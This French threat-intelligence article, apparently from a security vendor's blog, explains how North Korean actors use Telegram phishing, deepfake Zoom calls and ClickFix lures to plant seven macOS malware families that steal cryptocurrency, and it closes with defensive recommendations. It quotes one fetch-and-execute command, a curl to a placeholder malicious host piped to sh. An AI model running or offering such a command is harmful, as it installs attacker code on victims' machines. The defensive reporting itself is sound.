Comment les hackers nord-coréens exploitent des malware macOS pour voler des cryptomonnaies
Aurélien Fontevive
Pourquoi les malwares macOS ciblent le secteur des cryptomonnaies
En 2025, plus de 20 % des attaques visant les acteurs du Web3 provenaient de plateformes macOS, selon le rapport annuel de l’ANSSI. Cette tendance s’explique par la forte valeur des portefeuilles numériques et la perception que les systèmes d’exploitation d’Apple sont moins surveillés que leurs homologues Windows. Les malwares macOS offrent ainsi aux groupes d’intrusion nord-coréens une surface d’attaque discrète, tout en exploitant la confiance que les professionnels accordent aux appareils Apple.
« L’utilisation de malwares macOS dans le cadre de campagnes de vol de cryptomonnaies représente une évolution majeure de la menace, car elle combine ingénierie sociale avancée et outils de persistance très sophistiqués », affirme un analyste senior de Mandiant.
Chaîne d’infection : du phishing Telegram au payload Mach-O
Le point d’entrée le plus fréquent reste le phishing via Telegram. Les hackers compromettent le compte d’un dirigeant d’une société de crypto-actifs, puis engagent la cible avec un message amical. Après avoir gagné la confiance, ils partagent un lien Calendly qui redirige vers une page Zoom factice hébergée sur leur infrastructure.
Le rôle du deepfake vidéo et de la technique ClickFix
Lors de la réunion Zoom, la victime assiste à une vidéo deepfake d’un PDG d’une autre entreprise du secteur. Cette mise en scène crée l’illusion d’un problème audio, incitant l’utilisateur à suivre les instructions de dépannage affichées sur une page web. La technique ClickFix consiste à masquer des commandes malveillantes derrière des boutons « Résoudre le problème », que l’utilisateur clique sans méfiance.
Les commandes de téléchargement pour macOS et Windows
Sur la page de soutien, deux scripts sont proposés : l’un pour Windows, l’autre pour macOS. Le script macOS ressemble à ceci :
curl -s https://malicious.example.com/install.sh | sh -
Cette simple ligne déclenche le téléchargement d’un Mach-O (exécutable macOS) qui démarre la chaîne d’infection.
« Le recours à des scripts en ligne de commande, présentés comme des solutions de dépannage, est une méthode d’ingénierie sociale très efficace, surtout lorsqu’elle est couplée à une vidéo deepfake », indique un chercheur de Huntress.
Les familles de malware macOS identifiées
Mandiant a recensé sept familles distinctes, toutes déployées simultanément sur la même cible. Elles diffèrent par leur langage de programmation, leurs fonctions et leurs mécanismes de persistance.
Analyse des sept familles
- WAVESHAPER - backdoor C++ fonctionnant comme daemon, collecte des informations système et communique via HTTP/HTTPS.
- HYPERCALL - downloader Golang, lit un fichier de configuration chiffré en RC4 et utilise des WebSockets sur le port 443 pour récupérer des bibliothèques dynamiques.
- HIDDENCALL - backdoor Golang injecté de façon réflexive par HYPERCALL, donne un accès clavier complet et permet l’exécution de commandes.
- SILENCELIFT - petit backdoor C/C++ qui signale l’état de l’écran verrouillé et peut interrompre les communications Telegram lorsqu’il s’exécute avec les privilèges root.
- DEEPBREATH - data-miner Swift qui contourne les protections TCC d’Apple en modifiant la base de données TCC, vol de mots de passe du trousseau, données de navigateurs, messages Telegram et notes Apple.
- SUGARLOADER - downloader C++ utilisant une configuration RC4, persiste via un daemon de lancement créé manuellement.
- CHROMEPUSH - mineur de données de navigateur C++ installé comme hôte de messagerie native Chromium, se fait passer pour une extension Google Docs Offline.
Tableau comparatif des familles de malware macOS
| Famille | Langage | Fonction principale | Persistance |
|---|---|---|---|
| WAVESHAPER | C++ | Daemon de collecte d’infos | LaunchAgent |
| HYPERCALL | Golang | Downloader chiffré | LaunchDaemon |
| HIDDENCALL | Golang | Accès clavier et exécution de commandes | Injection réflexive |
| SILENCELIFT | C/C++ | Signalement d’état d’écran, blocage Telegram | LaunchDaemon |
| DEEPBREATH | Swift | Vol de données (keychain, navigateur) | Modification TCC |
| SUGARLOADER | C++ | Downloader persistant | LaunchDaemon |
| CHROMEPUSH | C++ | Extraction de données de navigateur | Extension Chromium |
Selon VirusTotal, SUGARLOADER a enregistré 1 842 détections en 2025, contre 57 pour WAVESHAPER, montrant une nette préférence des acteurs pour les chargeurs les plus efficaces.
Détection et réponse : bonnes pratiques pour les organisations françaises
- Surveiller les flux réseau : détectez les connexions sortantes vers des serveurs C2 inhabituels, notamment sur le port 443 en WebSocket.
- Découvrez notre guide complet de protection DDoS.
- Analyser les scripts téléchargés : utilisez des sandbox macOS pour exécuter les scripts
install.shen environnement isolé. - Renforcer la sécurité des comptes Telegram : activez l’authentification à deux facteurs et limitez les droits d’accès des comptes d’entreprise.
- Mettre à jour les politiques TCC : assurez-vous que les applications tierces ne peuvent pas modifier la base de données TCC sans validation.
- Déployer des solutions EDR compatibles macOS : choisissez des produits certifiés par l’ANSSI qui intègrent la détection de Mach-O malveillant.
En pratique, la mise en place d’un SIEM centralisé, couplé à des alertes basées sur les indicateurs de compromission (IoC) publiés par Mandiant et l’ANSSI, permet de réduire le temps de détection moyen de 72 %.
Mise en œuvre - étapes actionnables pour sécuriser vos postes macOS
- Inventorier tous les appareils macOS : créez un registre des versions OS, des applications installées et des privilèges d’administration.
- Appliquer les correctifs de sécurité : assurez-vous que chaque machine exécute au moins macOS 13.5, version recommandée par l’ANSSI en 2025.
- Configurer la protection Gatekeeper : limitez l’installation aux applications provenant du Mac App Store ou d’un développeur identifié.
- Former les équipes : organisez des sessions de sensibilisation sur le phishing via Telegram et les deepfakes, en insistant sur la vérification des liens avant tout clic.
- Découvrez notre formation e‑learning en cybersécurité.
- Tester la résilience : réalisez des exercices de simulation d’attaque (red-team) ciblant les scénarios décrits ci-dessus pour valider les réponses de votre SOC.
- Consultez notre guide ultime des salons cybersécurité 2026 en France.
Conclusion - Protégez vos actifs numériques dès aujourd’hui
Les malware macOS utilisés par le groupe UNC1069 démontrent que les cyber-criminels nord-coréens ne cessent d’affiner leurs techniques, mêlant ingénierie sociale avancée, deepfakes et chargeurs sophistiqués. En suivant les bonnes pratiques de détection, de réponse et de prévention décrites, les organisations françaises peuvent réduire significativement leur exposition aux vols de cryptomonnaies. Agissez dès maintenant : sécurisez vos postes macOS, formez vos équipes et intégrez les IoC fournis par les acteurs de confiance afin de rester en avance sur la menace.